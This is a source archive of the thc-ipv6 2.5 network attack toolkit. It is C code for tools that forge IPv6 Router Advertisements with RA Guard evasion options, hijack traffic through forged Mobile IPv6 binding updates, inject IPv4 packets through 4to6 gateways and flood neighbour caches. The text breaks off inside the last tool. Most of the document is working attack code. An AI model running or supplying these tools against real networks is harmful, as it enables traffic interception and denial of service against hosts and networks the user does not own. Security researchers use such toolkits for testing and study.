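thc-ipv6-2.5/0000755000000000000000000000000012257246644011532 5ustar rootrootthc-ipv6-2.5/four2six.c0000644000000000000000000001001712251022437013440 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

/*
 * Print the usage text for four2six and terminate the process.
 *
 * prg is the program name shown in the banner and syntax line.
 * Never returns: the function ends with exit(-1).
 */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s [-FHD] [-s src6] interface ipv6-to-ipv4-gateway ipv4-src ipv4-dst [port]\n\n", prg);
  printf("Options:\n");
  printf(" -F insert atomic fragment header (can be set multiple times)\n");
  printf(" -H insert and empty hop-by-hop header\n");
  printf(" -D insert a large destination header that fragments the packet\n");
  printf(" -s src6 set a specific IPv6 source address\n");
  printf("\nSend an IPv4 packet to an IPv6 4to6 gateway. If a port is specified, a UDP packet is sent, otherwise an ICMPv4 ping.\n");
  exit(-1);
}

/*
 * four2six entry point.
 *
 * Parses the -F/-H/-D/-s options and the positional arguments
 *   interface ipv6-to-ipv4-gateway ipv4-src ipv4-dst [port]
 * builds one IPv6 packet addressed to the gateway, appends an IPv4 payload
 * with thc_add_ipv4_rudimentary() and sends it once.
 *
 * Returns 0 after sending and -1 when a packet-building helper fails;
 * argument errors terminate through exit(-1).
 */
int main(int argc, char *argv[]) {
  /* The extension-header buffers are zero-filled so that no uninitialised
   * stack bytes are handed to the header helpers. */
  unsigned char *pkt1 = NULL, buf2[6] = { 0 }, buf3[1500] = { 0 };
  unsigned char *gateway6, *src6 = NULL, *dst6 = NULL, srcmac[16] = "", *mac = srcmac;
  /* cnt seeds the fragment identifiers; it was read uninitialised before. */
  int pkt1_len = 0, prefer = PREFER_GLOBAL, i, do_hop = 0, do_dst = 0, do_frag = 0, cnt = 0, type = NXT_ICMP6, offset = 14;
  char *interface;
  int src4 = 0, dst4 = 0, port = -1;   /* port == -1 selects the ICMPv4 ping */
  thc_ipv6_hdr *hdr;

  if (argc < 5 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL)
    printf("WARNING: %s is not working with injection!\n", argv[0]);

  while ((i = getopt(argc, argv, "DFHs:")) >= 0) {
    switch (i) {
    case 'F':
      do_frag++;
      break;
    case 'H':
      do_hop = 1;
      break;
    case 'D':
      do_dst = 1;
      break;
    case 's':
      if ((src6 = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: invalid IPv6 source address specified: %s\n", optarg);
        /* Stop here, like every other argument error in this function,
         * instead of continuing with a NULL source address. */
        exit(-1);
      }
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  if (argc - optind < 4)
    help(argv[0]);

  /* do_hdr_size is not defined in this file (presumably thc-ipv6.h). */
  if (do_hdr_size)
    offset = do_hdr_size;

  interface = argv[optind];
  if ((gateway6 = thc_resolve6(argv[optind + 1])) == NULL) {
    fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]);
    exit(-1);
  }

  /* src ip4, dst ip4. inet_aton() returns 0 for an invalid address and
   * never a negative value, so the former "< 0" test could not fire. */
  if (inet_aton(argv[optind + 2], (struct in_addr *)&src4) == 0) {
    fprintf(stderr, "Error: not a valid IPv4 address: %s\n", argv[optind + 2]);
    exit(-1);
  }
  if (inet_aton(argv[optind + 3], (struct in_addr *)&dst4) == 0) {
    fprintf(stderr, "Error: not a valid IPv4 address: %s\n", argv[optind + 3]);
    exit(-1);
  }

  /* NOTE(review): atoi() gives no error indication and the port range is
   * not checked here. */
  if (argc - optind > 4)
    port = atoi(argv[optind + 4]);

  if ((mac = thc_get_own_mac(interface)) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }

  if ((pkt1 = thc_create_ipv6_extended(interface, prefer, &pkt1_len, src6, gateway6, 0, 0, 0, 0, 0)) == NULL)
    return -1;

  if (do_hop) {
    type = NXT_HBH;
    if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf2, sizeof(buf2)) < 0)
      return -1;
  }
  if (do_frag) {
    if (type == NXT_ICMP6)
      type = NXT_FRAG;
    for (i = 0; i <= do_frag; i++)
      if (thc_add_hdr_oneshotfragment(pkt1, &pkt1_len, cnt++) < 0)
        return -1;
  }
  if (do_dst) {
    if (type == NXT_ICMP6)
      type = NXT_DST;
    if (thc_add_hdr_dst(pkt1, &pkt1_len, buf3, sizeof(buf3)) < 0)
      return -1;
  }

  if (thc_add_ipv4_rudimentary(pkt1, &pkt1_len, src4, dst4, port) < 0)
    return -1;

  if (thc_generate_pkt(interface, mac, NULL, pkt1, &pkt1_len) < 0) {
    fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
    exit(-1);
  }

  printf("Sending IPv4 %s packet from %s to %s via 4to6 gateway %s\n", port == -1 ? "ICMPv4 ping" : "UDPv4", argv[optind + 2], argv[optind + 3], argv[optind + 1]);

  if (do_dst) {
    hdr = (thc_ipv6_hdr *) pkt1;
    /* NOTE(review): dst6 is never assigned in this function, so NULL is
     * passed as the destination here; confirm how thc_send_as_fragment6()
     * treats a NULL destination. */
    thc_send_as_fragment6(interface, src6, dst6, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240);
  } else {
    thc_send_pkt(interface, pkt1, &pkt1_len);
  }

  return 0;
}
thc-ipv6-2.5/INSTALL0000644000000000000000000000061512257246607012564 0ustar rootrootINSTALLATION ============ THC-IPV6 requires libpcap development files being installed, also the libopenssl development files are a good idea. 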
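For Debian/Ubunut/Kali/Backtrack, you can install them by: $ sudo apt-get install libpcap-dev libssl-dev To compile simply type $ make All tools are installed to /usr/local/bin if you type $ sudo make install You need to be root to run most tools thc-ipv6-2.5/fake_router26.c0000644000000000000000000004477412251022436014355 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

#define MAX_ENTRIES 16

/* File-scope state shared by main() and the pcap callback send_rs_reply(). */
int plife = 99999, rlife = 4096, llife = 2048, reach = 0, trans = 0, dlife = 4096, cnt, to_send = 256, flags = 0, myoff = 14;
char *frbuf, *frbuf2, *frint, buf3[1232];
int frbuflen, frbuf2len, do_overlap = 0, do_hop = 0, do_frag = 0, do_dst = 0, type = NXT_ICMP6, prio = 2, interval = 5;
unsigned char *frip6, *frmac;
thc_ipv6_hdr *frhdr = NULL;

/*
 * Print the usage text for fake_router26 and terminate the process.
 *
 * prg is the program name shown in the banner and syntax line.
 * Never returns: the function ends with exit(-1).
 */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s [-E type] [-A network/prefix] [-R network/prefix] [-D dns-server] [-s sourceip] [-S sourcemac] [-ardl seconds] [-Tt ms] [-n no] [-i interval] interface [target]\n\n", prg);
  printf("Options:\n");
  printf(" -A network/prefix add autoconfiguration network (up to %d times)\n", MAX_ENTRIES);
  printf(" -a seconds valid lifetime of prefix -A (defaults to %d)\n", plife);
  printf(" -R network/prefix add a route entry (up to %d times)\n", MAX_ENTRIES);
  printf(" -r seconds route entry lifetime of -R (defaults to %d)\n", rlife);
  printf(" -D dns-server specify a DNS server (up to %d times)\n", MAX_ENTRIES);
  printf(" -L searchlist specify the DNS domain search list, separate entries with ,\n");
  printf(" -d seconds dns entry lifetime of -D (defaults to %d\n", dlife);
  printf(" -M mtu the MTU to send, defaults to the interface setting\n");
  printf(" -s sourceip the source ip of the router, defaults to your link local\n");
  printf(" -S sourcemac the source mac of the router, defaults to your interface\n");
  printf(" -l seconds router lifetime (defaults to %d)\n", llife);
  printf(" -T ms reachable timer (defaults to %d)\n", reach);
  printf(" -t ms retrans timer (defaults to %d)\n", trans);
  printf(" -p priority priority \"low\", \"medium\", \"high\" (default), \"reserved\"\n");
  printf(" -F flags Set one or more of the following flags: managed, other,\n");
  printf(" homeagent, proxy, reserved; separate by comma\n");
  printf(" -E type Router Advertisement Guard Evasion option. Types: \n");
  printf(" H simple hop-by-hop header\n");
  printf(" 1 simple one-shot fragmentation header (can add multiple)\n");
  printf(" D insert a large destination header so that it fragments\n");
  printf(" O overlapping fragments for keep-first targets (Win, BSD, Mac)\n");
  printf(" o overlapping fragments for keep-last targets (Linux, Solaris)\n");
  printf(" Examples: -E H111, -E D\n"); //, -E O, -E o (the last two are best)\n");
  printf(" -m mac-address if only one machine should receive the RAs (not with -E DoO)\n");
  printf(" -i interval time between RA packets (default: %d)\n", interval);
  printf(" -n number number of RAs to send (default: unlimited)\n");
  printf("\nAnnounce yourself as a router and try to become the default router.\n");
  printf("If a non-existing link-local or mac address is supplied, this results in a DOS.\n");
// printf("Use -r to use raw mode.\n\n");
  exit(-1);
}

/*
 * pcap callback: react to one captured frame.
 *
 * The frame is only acted on when it is at least 14 + 40 + 2 bytes long,
 * the IPv6 next-header byte is NXT_ICMP6 and the first byte after the 40-byte
 * IPv6 header is ICMP6_ROUTERSOL. For such a frame a reply packet is built
 * from the file-scope buffers prepared by main() and sent to the sender.
 *
 * foo    - user pointer from the capture loop, unused here
 * header - pcap metadata; only caplen is read
 * data   - captured bytes, parsed with a fixed 14-byte link header
 */
void send_rs_reply(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  unsigned char *pkt = NULL, *dstmac = (unsigned char *) data + 6, *dst = (unsigned char *) data + 14 + 8, *ipv6hdr = (unsigned char *) (data + 14);
  thc_ipv6_hdr *hdr;
  int pkt_len = 0, i;

  /* The captured length is checked first: the original tested it last, so
   * ipv6hdr[6] and ipv6hdr[40] were read from frames too short to hold
   * them (out-of-bounds read on network-supplied data). */
  if (header->caplen < 14 + 40 + 2 || ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_ROUTERSOL)
    return;

  if ((pkt = thc_create_ipv6_extended(frint, PREFER_LINK, &pkt_len, frip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
    return;

  /* NOTE(review): the early returns below leave pkt allocated; whether it
   * may be passed to thc_destroy_packet() after a failed helper cannot be
   * confirmed from this file. */
  if (do_hop) {
    type = NXT_HBH;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, frbuf2len) < 0)
      return;
  }
  if (do_frag) {
    type = NXT_FRAG;
    for (i = 0; i <= do_frag; i++)
      if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + (cnt++ << 16)) < 0)
        return;
  }
  if (do_dst) {
    if (type == NXT_ICMP6)
      type = NXT_DST;
    if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
      return;
  }
  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, frbuf, frbuflen, 0) < 0)
    return;

  if (do_dst) {
    thc_generate_pkt(frint, frmac, dstmac, pkt, &pkt_len);
    /* A local header pointer is used instead of the global frhdr: main()
     * keeps reading frhdr in its send loop, and pkt is handed to
     * thc_destroy_packet() below, which presumably releases it. */
    hdr = (thc_ipv6_hdr *) pkt;
    thc_send_as_fragment6(frint, frip6, dst, type, hdr->pkt + 40 + myoff, hdr->pkt_len - 40 - myoff, 1232);
  } else {
    if (thc_generate_and_send_pkt(frint, frmac, dstmac, pkt, &pkt_len) < 0)
      return;
  }
  pkt = thc_destroy_packet(pkt);
}

/* fake_router26 entry point. Only its declarations and the first option
 * cases fall inside this span; the function continues on the following
 * lines and is reproduced here unchanged. */
int main(int argc, char *argv[]) {
  char *interface, mac[16] = "", dmac[16] = "";
  unsigned char *routerip6, *mac6 = NULL, *ip6 = NULL;
  unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2";
  unsigned char rbuf[MAX_ENTRIES + 1][17], pbuf[MAX_ENTRIES + 1][17], *dbuf[MAX_ENTRIES + 1];
  unsigned char *dst = thc_resolve6("ff02::1");
  unsigned char *dstmac = thc_get_multicast_mac(dst);
  int size, mtu = 0, i, j, k, l, m, n, rcnt = 0, pcnt = 0, dcnt = 0, sent = 0;
  unsigned char *pkt = NULL, *searchlist = NULL;
  int pkt_len = 0;
  pcap_t *p;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  memset(rbuf, 0, sizeof(rbuf));
  memset(mac, 0, sizeof(mac));

  while ((i = getopt(argc, argv, "i:r:E:R:M:m:S:s:D:L:A:a:r:d:t:T:p:n:l:F:")) >= 0) {
    switch (i) {
    case 'i':
      interval = atoi(optarg);
      break;
    case 'm':
      /* NOTE(review): the sscanf() result is not checked, and each %x
       * stores a whole unsigned int at a char offset of dmac. */
      sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4], (unsigned int *) &dmac[5]);
      dstmac = dmac;
      break;
    case 'S':
      sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]);
      mac6 = mac;
      break;
    case 's':
      if ((ip6 = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: can not resolve source ip address %s\n", optarg);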
exit(-1); } break; case 'M': mtu = atoi(optarg); if (mtu < 0 || mtu > 65535) { fprintf(stderr, "Error: mtu argument is invalid: %s\n", optarg); exit(-1); } if (mtu < 1228 || mtu > 1500) fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing: %d\n", mtu); break; case 'n': to_send = atoi(optarg); if (to_send < 1 || mtu > 255) { fprintf(stderr, "Error: -n argument is invalid, must be between 1 and 255: %s\n", optarg); exit(-1); } break; case 'A': if (pcnt >= MAX_ENTRIES) { fprintf(stderr, "Error: you can not define more than %d autoconfig addresses\n", MAX_ENTRIES); exit(-1); } if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) { fprintf(stderr, "Error: -A option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg); exit(-1); } *ptr++ = 0; if ((size = atoi(ptr)) < 0 && size > 255) { // yes we allow bad sizes :-) fprintf(stderr, "Error: -A option prefix length must be between 0 and 128: %s\n", optarg); exit(-1); } if (size != 64) fprintf(stderr, "Warning: -A option defines an unusual prefix length: %d\n", size); if (index(optarg, ':') == NULL) strcat(optarg, "::"); if ((routerip6 = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: -A option network is invalid: %s\n", optarg); exit(-1); } pbuf[pcnt][0] = size % 256; memcpy((char *) &pbuf[pcnt][1], routerip6, 16); pcnt++; break; case 'a': plife = atoi(optarg); break; case 'r': rlife = atoi(optarg); break; case 'd': dlife = atoi(optarg); break; case 'l': llife = atoi(optarg); break; case 'T': reach = atoi(optarg); break; case 't': trans = atoi(optarg); break; case 'p': if (strncasecmp(optarg, "low", 3) == 0) prio = 0; else if (strncasecmp(optarg, "med", 3) == 0) prio = 1; else if (strncasecmp(optarg, "hi", 2) == 0) prio = 2; else if (strncasecmp(optarg, "res", 3) == 0) prio = 3; else { fprintf(stderr, "Error: unknown priority, known keywords are low, medium and high: %s\n", optarg); exit(-1); } break; case 'R': if (rcnt >= MAX_ENTRIES) { fprintf(stderr, "Error: 
you can not define more than %d routes\n", MAX_ENTRIES); exit(-1); } if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) { fprintf(stderr, "Error: -R option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg); exit(-1); } *ptr++ = 0; if ((size = atoi(ptr)) < 0 && size > 255) { // yes we allow bad sizes :-) fprintf(stderr, "Error: -R option prefix length must be between 0 and 128: %s\n", optarg); exit(-1); } if (index(optarg, ':') == NULL) strcat(optarg, "::"); if ((routerip6 = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: -R option network is invalid: %s\n", optarg); exit(-1); } rbuf[rcnt][0] = size % 256; memcpy((char *) &rbuf[rcnt][1], routerip6, 16); rcnt++; break; case 'D': if (dcnt >= MAX_ENTRIES) { fprintf(stderr, "Error: you can not define more than %d DNS servers\n", MAX_ENTRIES); exit(-1); } if ((dbuf[dcnt++] = thc_resolve6(optarg)) == NULL) { fprintf(stderr, "Error: can not resolve DNS server %s\n", optarg); exit(-1); } break; case 'L': searchlist = optarg; break; case 'E': if (optarg == NULL) { fprintf(stderr, "Error: no option type given for -E\n"); exit(-1); } for (j = 0; j < strlen(optarg); j++) { switch (optarg[j]) { // fall through to be fail safe on accidental misuse case '0': // fall through case 'O': do_overlap = 1; break; case 'o': do_overlap = 2; break; case '1': // fall through case 'l': // fall through case 'L': do_frag++; break; case 'h': // fall through case 'H': do_hop = 1; break; case 'd': // fall through case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: unknown evasion type %c!\n", optarg[j]); exit(-1); } if ((do_frag && (do_dst || do_overlap)) || (do_dst && do_overlap)) { fprintf(stderr, "Error: you can not use -E types 1, D, O and o together!\n"); exit(-1); } } break; case 'F': ptr = strtok(optarg, ","); while (ptr != NULL) { if (strncasecmp(ptr, "man", 3) == 0) flags = (flags | 128); else if (strncasecmp(ptr, "oth", 3) == 0) flags = (flags | 64); else if (strncasecmp(ptr, "hom", 3) 
== 0) flags = (flags | 32); else if (strncasecmp(ptr, "prox", 4) == 0) flags = (flags | 4); else if (strncasecmp(ptr, "res", 3) == 0) flags = (flags | 2); else if (strncasecmp(ptr, "unk", 3) == 0) flags = (flags | 1); else { fprintf(stderr, "Error: unknown flag: %s\n", ptr); exit(-1); } ptr = strtok(NULL, ","); } break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if ((argc - optind) < 1 || (argc - optind) > 2) help(argv[0]); if (do_hdr_size) myoff = do_hdr_size; interface = argv[optind]; if (argc - optind == 2) if ((dst = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: invalid target %s\n", argv[optind + 1]); exit(-1); } if (mtu == 0) mtu = thc_get_mtu(interface); if (mac6 == NULL) if ((mac6 = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (ip6 == NULL) if ((ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK)) == NULL) { fprintf(stderr, "Error: IPv6 is not enabled on interface %s\n", interface); exit(-1); } // if (dns == NULL) // dns = thc_resolve6("ff02::fb"); frint = interface; frip6 = ip6; frmac = mac6; frbuf = buf; frbuf2 = buf2; frbuf2len = sizeof(buf2); memset(buf, 0, sizeof(buf)); memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); if (llife > 0xffff) llife = 0xffff; llife = (llife | 0xff000000); if (prio == 2) llife = (llife | 0x00080000); else if (prio == 0) llife = (llife | 0x00180000); else if (prio != 1) llife = (llife | 0x00100000); llife = (llife | (flags << 16)); buf[0] = reach / 16777216; buf[1] = (reach % 16777216) / 65536; buf[2] = (reach % 65536) / 256; buf[3] = reach % 256; buf[4] = trans / 16777216; buf[5] = (trans % 16777216) / 65536; buf[6] = (trans % 65536) / 256; buf[7] = trans % 256; // option mtu buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; i = 16; // mac address option buf[i++] = 1; buf[i++] = 1; memcpy(buf + i, mac6, 6); 
i += 6; // option prefix, put all in if (pcnt > 0) for (j = 0; j < pcnt; j++) { buf[i++] = 3; buf[i++] = 4; buf[i++] = pbuf[j][0]; // prefix length buf[i++] = 128 + 64; buf[i++] = plife / 16777216; buf[i++] = (plife % 16777216) / 65536; buf[i++] = (plife % 65536) / 256; buf[i++] = plife % 256; buf[i++] = (plife / 2) / 16777216; buf[i++] = ((plife / 2) % 16777216) / 65536; buf[i++] = ((plife / 2) % 65536) / 256; buf[i++] = (plife / 2) % 256; i += 4; // + 4 bytes reserved memcpy(&buf[i], (char *) &pbuf[j][1], 16); i += 16; } // route option, put all in if (rcnt > 0) for (j = 0; j < rcnt; j++) { buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = rbuf[j][0]; // prefix length if (prio == 2) buf[i++] = 0x08; // priority, highest of course else if (prio == 1) buf[i++] = 0x00; else if (prio == 0) buf[i++] = 0x18; else buf[i++] == 0x10; buf[i++] = rlife / 16777216; buf[i++] = (rlife % 16777216) / 65536; buf[i++] = (rlife % 65536) / 256; buf[i++] = rlife % 256; memcpy((char *) &buf[i], (char *) &rbuf[j][1], 16); // network i += 16; } // dns option if (dcnt > 0) for (j = 0; j < dcnt; j++) { buf[i++] = 0x19; // dns option type buf[i++] = 0x03; // length i += 2; // reserved buf[i++] = dlife / 16777216; buf[i++] = (dlife % 16777216) / 65536; buf[i++] = (dlife % 65536) / 256; buf[i++] = dlife % 256; memcpy(buf + i, dbuf[j], 16); // dns server i += 16; } // dns searchlist option if (searchlist != NULL) { buf[i] = 31; buf[i + 4] = dlife / 16777216; buf[i + 5] = (dlife % 16777216) / 65536; buf[i + 6] = (dlife % 65536) / 256; buf[i + 7] = dlife % 256; if (searchlist[strlen(searchlist) - 1] == '.') searchlist[strlen(searchlist) - 1] = 0; m = 0; while ((ptr = strstr(searchlist, ".,")) != NULL) { m = strlen(ptr); for (l = 1; l < m; l++) ptr[l - 1] = ptr[l]; ptr[m - 1] = 0; } l = 0; m = 0; j = strlen(searchlist); do { k = 0; ptr = index(&searchlist[l], '.'); if (ptr == NULL || (index(&searchlist[l], ',') != NULL && (char*)ptr > 
(char*)index(&searchlist[l], ','))) { k = 1; ptr = index(&searchlist[l], ','); } if (ptr != NULL) *ptr = 0; n = strlen(&searchlist[l]); buf[i + 8 + m] = n; memcpy(&buf[i + 8 + m + 1], &searchlist[l], n); if (ptr == NULL) l = j; else l += 1 + n; m += 1 + n; if (k || ptr == NULL) m++; // end of domain entry } while (l < j && ptr != NULL); if (m % 8 > 0) m = ( (m / 8) + 1 ) * 8; buf[i + 1] = m/8 + 1; i += m + 8; } frbuflen = i; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0) return -1; } if (do_frag) { type = NXT_FRAG; for (j = 0; i < do_frag; j++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + (cnt++ << 16)) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, llife, buf, i, 0) < 0) return -1; if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) return -1; frhdr = (thc_ipv6_hdr *) pkt; //printf("DEBUG: RA size is %d bytes, do_dst %d, do_overlap %d\n", i + 8, do_dst, do_overlap); // init pcap if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } printf("Starting to advertise router (Press Control-C to end) ...\n"); while (sent < to_send || to_send > 255) { if (do_dst) { thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232); } else if (do_overlap) { if (do_overlap == 1) thc_send_as_overlapping_first_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0); else thc_send_as_overlapping_last_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0); } else { thc_send_pkt(interface, pkt, &pkt_len); } while 
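/* Tail of fake_router26.c main(): the expression below completes the
 * `while` that ends the preceding line. */
(thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0);
    sent++;
    if (sent != to_send || to_send > 255)
      sleep(interval);
  }
  return 0; // never reached
}
thc-ipv6-2.5/fake_mipv6.c0000644000000000000000000000467412251022435013720 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

/* Scratch buffer and length for the header and payload bytes built in main(). */
unsigned char buf[64];
int buf_len = 0;

/*
 * Print the usage text for fake_mipv6 and terminate the process.
 *
 * prg is the program name shown in the banner and syntax line.
 * Never returns: the function ends with exit(-1).
 */
void help(char *prg) {
  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
  printf("Syntax: %s interface home-address home-agent-address care-of-address\n\n", prg);
  printf("If the mobile IPv6 home-agent is mis-configured to accept MIPV6 updates without\n");
  printf("IPSEC, this will redirect all packets for home-address to care-of-address\n");
// printf("Use -r to use raw mode.\n\n");
  exit(-1);
}

/*
 * fake_mipv6 entry point.
 *
 * Takes `interface home-address home-agent-address care-of-address`,
 * optionally preceded by -r (raw mode), and sends four packets from the
 * care-of address to the home agent; the id written into bytes 6-7 of the
 * payload grows by 16384 per packet.
 *
 * Returns 0 when the loop finishes and -1 when a packet-building helper
 * fails; argument errors terminate through help() or exit(-1).
 */
int main(int argc, char *argv[]) {
  unsigned char *pkt1 = NULL;
  unsigned char *h = NULL, *ha = NULL, *coa = NULL, *mac = NULL;
  int pkt1_len = 0, rawmode = 0;
  unsigned int id = 2, i;
  char *interface;
  char *prg = argv[0];
  thc_ipv6_hdr *hdr;

  /* Four positional arguments are read below (argv[1]..argv[4]); the
   * original only required three, so argv[4] could be NULL. */
  if (argc < 5 || strncmp(argv[1], "-h", 2) == 0)
    help(prg);

  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }
  /* Re-check after -r has consumed one argument. */
  if (argc < 5)
    help(prg);

  interface = argv[1];
  h = thc_resolve6(argv[2]);
  ha = thc_resolve6(argv[3]);
  coa = thc_resolve6(argv[4]);
  /* The resolved addresses are copied with memcpy() below, so a failed
   * lookup must stop here instead of dereferencing NULL. */
  if (h == NULL || ha == NULL || coa == NULL) {
    fprintf(stderr, "Error: unable to resolve addresses\n");
    exit(-1);
  }

  if (rawmode == 0 && (mac = thc_get_mac(interface, coa, ha)) == NULL) {
    fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
    exit(-1);
  }

  if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }

  for (i = 0; i < 4; i++) {
    /* 22 bytes of destination-header content: fixed bytes plus the
     * 16-byte home address. */
    memset(buf, 0, sizeof(buf));
    buf[0] = 1;
    buf[1] = 2;
    buf[4] = 201;
    buf[5] = 16;
    memcpy(&buf[6], h, 16);
    buf_len = 22;

    /* NOTE(review): pkt1 is allocated on every iteration and not released
     * in this loop. */
    if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, coa, ha, 64, 0, 0, 0, 0)) == NULL)
      return -1;
    hdr = (thc_ipv6_hdr *) pkt1;
    hdr->original_src = h;
    if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, buf_len) < 0)
      return -1;

    /* 32 bytes of NXT_MIPV6 payload: fixed bytes, the id in bytes 6-7 and
     * the 16-byte care-of address. */
    memset(buf, 0, sizeof(buf));
    buf[0] = 59;
    buf[1] = 3;
    buf[2] = 5;
    buf[3] = 0;
    buf[6] = (id % 65536) / 256;
    buf[7] = id % 256;
    buf[8] = 192;
    buf[10] = 0xff;
    buf[11] = 0xff;
    buf[12] = 1;
    buf[14] = 3;
    buf[15] = 16;
    memcpy(&buf[16], coa, 16);
    buf_len = 32;

    if (thc_add_data6(pkt1, &pkt1_len, NXT_MIPV6, buf, buf_len) < 0)
      return -1;

    thc_generate_and_send_pkt(interface, NULL, mac, pkt1, &pkt1_len);
    id += 16384;
  }

  return 0;
}
thc-ipv6-2.5/ndpexhaust6.c0000644000000000000000000000677312251022440014140 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h"

/*
 * Print the usage text for ndpexhaust6 and terminate the process.
 *
 * prg is the program name shown in the banner and syntax line.
 * Never returns: the function ends with exit(-1).
 */
void help(char *prg) {
  printf("%s by mario fleischmann \n\n", prg);
  printf("Syntax: %s interface destination-network [sourceip]\n\n", prg);
  printf("Randomly pings IPs in target network\n\n");
  exit(-1);
}

/*
 * ndpexhaust6 entry point (the tool announces itself as deprecated).
 *
 * Takes `interface destination-network/prefixlen [sourceip]`, then loops
 * forever: the last (128 - prefixlen) / 8 bytes of the destination address
 * are replaced with rand() output and an ICMPv6 ping request is sent to the
 * result. A '.' is printed every 1000 packets and a '!' on a send error.
 *
 * The loop has no exit; argument errors terminate through help() or
 * exit(-1), packet-building failures through errx().
 */
int main(int argc, char *argv[]) {
  char *interface;
  int prefer = PREFER_GLOBAL;
  unsigned char *srcmac;
  unsigned char *dst6, *src6;
  unsigned char *ptr;

  //char dstmac[6] = "";
  unsigned char *dstmac = NULL, *tmpmac, *dstnet;
  int pkt_len = 16;
  int count = 0;
  int i;
  int size, numbytes, samenet = 0;
  unsigned char *pkt = NULL;
  unsigned char buf[] = "NDP Exhaustion";

  // hardcoded mac
  /*dstmac[0] = 0x00; dstmac[1] = 0x05; dstmac[2] = 0x73; dstmac[3] = 0xa0; dstmac[4] = 0x00; dstmac[5] = 0x01; */

  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  printf("!\n! Please note: ndpexhaust6 is deprecated, please use ndpexhaust26!\n!\n\n");

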